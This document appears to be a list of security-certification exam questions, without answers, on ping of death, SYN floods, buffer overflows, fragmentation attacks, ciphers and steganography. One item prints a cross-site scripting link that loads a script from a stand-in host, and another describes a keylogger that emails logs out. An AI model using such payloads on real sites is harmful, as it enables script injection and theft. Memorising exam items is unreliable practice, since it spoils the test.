Tess King, the evil hacker, is purposely sending fragmented ICMP packets to a remote target. The
total size of this ICMP packet once reconstructed is over 65, 536 bytes. From the information
given, what type of attack is Tess King attempting to perform?

This is an attack that takes advantage of a web site vulnerability in which the site displays content
that includes un-sanitized user-provided data.
<ahref=”http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js
%22%3E%3C/script%3E”>See foobar</a>
What is this attack?

Which one of the following instigates a SYN flood attack?

Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The
programmer makes an assumption that 200 characters are more than enough. Because there
were no proper boundary checks being conducted, Bob decided to insert 400 characters into the
200-character buffer. (Overflows the buffer). Below is the code snippet:

How can you protect/fix the problem of your application as shown above?

Global deployment of RFC 2827 would help mitigate what classification of attack?

Which of the following encryption is NOT based on block cipher?

What happens when one experiences a ping of death?

Michael is a junior security analyst working for the National Security Agency (NSA) working
primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use
to decipher encrypted messages including Government Access to Keys (GAK) and inside
informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the
Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use
custom-built algorithms or obscure algorithms purchased from corrupt governments. For this
reason, Michael and other security analysts like him have been forced to find different methods of
deciphering terrorist messages. One method that Michael thought of using was to hide malicious
code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by
known terrorists, and then he is able to glean email addresses to some of these suspected
terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then
sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes
and also logs all keyboard activity into a hidden file on the terrorist’s computer. Then, the
keylogger emails those files to Michael twice a day with a built in SMTP server. What technique
has Michael used to disguise this keylogging software?

Which one of the following network attacks takes advantages of weaknesses in the fragment
reassembly functionality of the TCP/IP protocol stack?

In which step Steganography fits in CEH System Hacking Cycle (SHC)